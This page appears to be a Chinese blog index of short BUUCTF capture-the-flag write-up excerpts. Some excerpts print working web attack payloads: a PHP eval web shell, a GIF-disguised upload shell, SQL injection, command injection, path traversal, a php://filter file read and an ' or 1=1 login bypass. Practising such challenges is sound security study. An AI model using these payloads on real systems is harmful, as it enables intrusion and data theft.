- 博客(25)
- 收藏
- 关注
原创 BUUCTF刷题记录 Easy MD5
[BJDCTF2020]Easy MD5进入网址输入ffifdyop,抓包发现(’./levels91.php’)进入再抓包发现然后构造/levels91.php?a[]=1&b[]=2抓包发现(’./levell14.php’)进入最后得flag
2020-06-02 16:54:42 298
原创 BUUCTF刷题记录 Harley Quinn
[GKCTF2020]Harley Quinn下载发现一张图片一个wavwav用Audacity打开听完发现最后有拨号音DTMF解得#222833344477773338866#根据hint九键输出 ctfisfun下载FreeFileCamouflage输入图片地址 密钥 然后De-Camouflage!得flag.txt...
2020-06-01 11:51:50 483
原创 BUUCTF刷题记录 cve版签到
[GKCTF2020]cve版签到进入网页传入/?url=http://127.0.0.1%00.ctfhub.com发现[4] => Tips: Host must be end with ‘123’把传入的改为?url=http://127.0.0.123%00.ctfhub.com得flag
2020-05-28 13:51:55 374
原创 BUUCTF刷题记录 老八小超市儿
[GKCTF2020]老八小超市儿进入网址admin.php进入后台账号admin密码shopxo应用中心——应用商城——主题下载默认主题编写一个a.php文件放进默认主题a.php文件内容<?php @eval($_POST[a]); phpinfo(); ?>测试成功性http://771c3e8f-4cea-4775-be69-fce5b8bd52f2.node3.buuoj.cn/public/static/index/default/a.ph
2020-05-28 11:59:44 488
原创 BUUCTF刷题记录 Check_1n
[GKCTF2020]Check_1n进入程序用IDA搜索字符串View-Open subviews-Strings(视图-打开子视图-字符串)找到开机密码 HelloWorld用上下左右控制里面的上下左右,空格键控制确认, 切换到打砖块程序,将光标控制至里面的回车键,用空格键确认得flag...
2020-05-27 17:17:50 398
原创 BUUCTF刷题记录 Pokémon
[GKCTF2020]Pokémon下载安装包 进入游戏来到天元镇接着做任务 经过101道路 道吉镇 到103道路 发现flag
2020-05-24 13:06:37 551
原创 BUUCTF刷题记录 小学生的密码学
[GKCTF2020]小学生的密码学仿射密码的代码实现 破解代码#include <iostream>#include<math.h>#include<string.h>using namespace std;//模的取逆int dx, y, q;void extend_Eulid(int aa, int bb){ if (bb == 0) { dx = 1; y = 0; q = aa; } else { extend_Eulid(b
2020-05-24 13:00:22 1717 3
原创 BUUCTF刷题记录 Easy Java
[RoarCTF 2019]Easy Java进入网址使用burpsuite抓包点击help 抓包把GET改为POST 传入filename值为WEB-INF/web.xml发现com.Wm.ctf.FlagController然后构造payload:filename=WEB-INF/classes/com/wm/ctf/FlagController.classbase64解码得flag...
2020-05-20 08:56:05 278
原创 BUUCTF刷题记录 Upload
[极客大挑战 2019]Upload进入页面选择文件上传 此处上传木马 木马内容为GIF89a<script language="php">eval($_POST['flag']);</script> 做一个phtml的文件
2020-05-19 10:41:40 480
原创 BUUCTF刷题记录 NiZhuanSiWei
[ZJCTF 2019]NiZhuanSiWei进入网址源码分析if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))用data伪协议传参?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=源码分析if(preg_match("/flag/",$file)){ echo "Not now!";
2020-05-18 19:32:43 445
原创 BUUCTF刷题记录 Http
[极客大挑战 2019]Http进入网址查看源代码发现Secret.php进入用burpsuite试试发现It doesn’t come from 'https://www.Sycsecret.com添加referer:https://www.Sycsecret.com又发现Please use “Syclover” browser添加User-Agent:Syclover browser紧接着发现No!!! you can only read this locally!!!再添加
2020-05-18 16:10:10 803
原创 BUUUCTF刷题记录 Fakebook
[网鼎杯 2018]Fakebook进入页面查表view.php?no=1 and updatexml(1,make_set(3,’~’,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#查列view.php?no=1 and updatexml(1,make_set(3,’~’,(select group_concat(column_name)
2020-05-17 09:16:29 278
原创 BUUCTF做题笔记 easy_tornado
[护网杯 2018]easy_tornado进入页面分别查看模板注入/error?msg={{1*2}}测试过滤payload:error?msg={{handler.settings}}得cookie_secret用PHP解码最后payload:/file?filename=/fllllllllllllag&filehash=e9bebc8c9f90af297419119189d8a9e4进入得flag...
2020-05-16 19:23:34 254
原创 BUUCTF刷题记录 Ping Ping Ping
[GXYCTF2019]Ping Ping Ping进入页面然后/?ip=127.0.0.1|ls进入读取flag.php再cat$IFS$1indnx.php再变量拼接?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php转至http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php再F12...
2020-05-16 18:55:32 1829
原创 BUUCTF刷题笔记 EasySQL 极客大挑战2019
[极客大挑战 2019]EasySQL进入网页使用万能密码admin’ or 1=1 #登入得flag
2020-05-14 14:55:29 168
原创 BUUCTF刷题笔记 Include
[ACTF2020 新生赛]Include进入网址http://ea90edbb-9604-451e-91d3-101f65554fee.node3.buuoj.cn/?file=flag.php使用 “php://filter"伪协议” 来进行包含构造Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php进入http://ea90edbb-9604-451e-91d3-101f65554fee.n
2020-05-14 14:45:01 388
原创 BUUCTF刷题笔记 BuyFlag
[极客大挑战 2019]BuyFlag进入页面点击menu,进到payflag页面,查看源代码发现<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password ==
2020-05-12 08:51:30 706
原创 BUUCTF刷题笔记 Secret File
[极客大挑战 2019]Secret File进入网页 查看源代码发现 /Archive_room.php进入 http://b113d9ac-3e92-40b5-ac49-585d56e600fc.node3.buuoj.cn/Archive_room.php点击STCRET会发现跳转 啥都没有这时候就要用到burp suite抓包发现<!DOCTYPE html><html><!-- secr3t.php --
2020-05-12 08:28:48 433
原创 BUUCTF刷题记录 Havefun
[极客大挑战 2019]Havefun进入页面查看页面源代码,在最后发现<!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } -->传参 cat=doghttp://dd2a9fa5-398c-4dbb-91c9-399f408b73da.node3.buuoj.cn/
2020-05-11 17:31:18 134
原创 BUUCTF做题笔记 Knife
[极客大挑战 2019]Knife进入页面使用中国蚁剑连接URL地址 http://4494b277-e30d-40a0-abdf-423e44f664fe.node3.buuoj.cn/?Knife.php密码 Syc添加;连接 ;打开文件管理找到flag
2020-05-11 17:17:52 816
原创 BUUCTF刷题记录 Exec
[ACTF2020 新生赛]Exec进入页面首先 127.0.0.1;ls 进行目录读取,然后 127.0.0.1;cat /flag得flag
2020-05-11 16:54:37 421
原创 BUUCTF解题记录 WarmUp
BUUCTF解题记录[HCTF 2018]WarmUp**发现source.php 访问发现hint.php`构造获取flag的语句详细参考https://www.cnblogs.com/xhds/p/12266072.html最终payload:http://dd6ac72f-565f-4e02-8778-a2930b07c833.node3.buuoj.cn/index.php?file=hint.php?../../../../../ffffllllaaaagggg获取flag参考
2020-05-11 10:19:52 463
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人